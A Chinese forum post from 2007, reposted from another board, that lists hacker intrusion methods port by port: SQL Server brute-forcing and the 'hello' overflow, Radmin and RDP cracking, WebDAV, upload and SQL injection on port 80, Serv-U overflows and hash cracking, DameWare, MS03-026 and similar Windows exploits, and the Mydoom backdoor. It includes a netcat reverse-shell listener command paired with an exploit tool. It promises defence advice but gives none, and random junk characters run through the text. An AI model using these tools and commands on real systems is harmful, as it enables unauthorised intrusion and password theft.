|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 1 h+ Q# [+ K. D& \
+ w. f8 r8 Z) N2 H/ X
8 p" L: X: t4 a, K/ d2 \# c0 I. a
1. 1433端口入侵 . r3 f/ ], r- \' V. B8 U
5 q8 f( m) S+ x9 q! G2 G+ Q, ~
scanport.exe 查有1433的机器 5 m7 u9 W9 D3 i, L. B
& p! Z; a4 j- U; i1 W0 f& O% y' Q
SQLScanPass.exe 进行字典暴破(字典是关键)
6 ^$ _- m* }# z+ g5 G$ Z" z1 Q+ l& s5 M
最后 SQLTools.exe入侵 - T! v ` Z# |% H) L/ u
+ Y( X' n4 I6 i6 q( T& ]( I& A =============================
+ I6 _$ a' h; v# d, c+ z% W5 n* r6 h! V- i# R0 e
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
+ s2 ?) g: Z* e
" O5 D( |# d& O& {+ g nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 ; A3 e$ s0 C5 D' F
! L z5 g" H- |; y) L. _7 q; s: `
(以上反向的,测试成功) ( J6 q3 M1 F- R& j& [
# M9 b9 z5 C: m6 H8 p
sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 3 _) l- a$ |/ U. V
K: G" G9 M: |: T$ J C z 2. 4899端口入侵 2 q; o- {& S/ J; i8 H
6 g/ H% e) b7 Q' f& z6 }
用4899过滤器.exe,扫描空口令的机器 ) a1 n2 h0 d8 U/ |( | c2 h% h) b
" w, H7 n3 s3 X+ ]# W 3. 3899的入侵
- |- @2 Z8 n& Y8 n' A; U* a- v
; c. r4 E5 x& Y# B6 m. `! N R 对很早的机器,可以试试3389的溢出(win3389ex.exe)
( X3 u+ `3 F2 |& }
6 X( d) S& X) L9 t 对2000的机器,可以试试字典暴破。(tscrack.exe) 7 M0 o3 ^4 P0 `; `
2 X( g5 L3 T7 G/ N( ~) n1 w 4. 80入侵 # C) M5 s. Z6 V+ z/ V
3 s# ]& b+ E4 j1 H& x& C 对sp3以前的机器,可以用webdav入侵; - O5 S1 Y0 k: }1 b8 q/ B
9 _; m: R+ s( S+ N$ i
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) $ g+ u: i* r' b8 N
$ g9 ^- z- a; k5 M: U6 H, t8 |* } 可以利用SQL进行注入。(小榕的注入软件)。 9 Y9 E$ @! O/ O, l) r: O- S
9 X2 Z, f7 X2 G% N1 t* a# F1 w: F' G
5. serv-u入侵(21端口) + g B0 p% k4 r A
8 h% |0 p9 C2 K- J( |
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) ( u M+ f# D0 |$ W( _ h
! m) D& c k B 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 1 m7 \4 o" A. n. l' S! b) q8 w$ k
7 M9 [0 q4 l/ O7 i8 n- b ======================================
6 B) U5 j L( q# R/ z. K+ f3 r1 J% Q% e
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) - e- _* ? L% x6 f/ k
7 O- \% F5 j8 P" _* t. J% y
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 2 E/ N( R4 F& F; `! J% g
. h+ c, Y* ~3 R# @3 z- y
6. 554端口 3 l) E$ X' K' c/ r$ x
9 G V! p) I4 t/ c. u 用real554.exe入侵。 - |0 V) }6 {5 ?2 p* c" L
+ }4 o ^( o2 G1 @/ V 7. 6129端口 0 s# Z3 [( ~: F5 W" k2 h1 E
' ?, I# \3 v4 q! C5 | 用DameWare6129.exe入侵。 9 p9 O3 e5 y, o
6 B) }) z1 ]6 D# X& O$ \
8. 系统漏洞 8 a n% d. O" T
0 b! y# ~* q: T: T `% o 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
! Z* v0 \& K9 ]3 G7 T- ?
- }! i- U9 b& m1 b9 r: i 进行溢出入侵。
) g- }. K! T: W8 Y/ m! E9 V6 O5 u1 _1 t
9. 3127等端口
9 b. e9 ~- J1 J& N8 L; s9 h
2 ?# e2 o r% @. f! { w 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 6 z4 A' W$ k; W5 j# G- z
+ S4 \: k8 a2 R- I% ~* _
10. 其他入侵
! D' o: t- ^+ V) K
1 E6 J8 n% X+ s& q4 j% ~ 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。/ n& E5 L1 o1 c8 i! }% O
1 d: |0 O7 k4 ?) z; A: R+ j
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
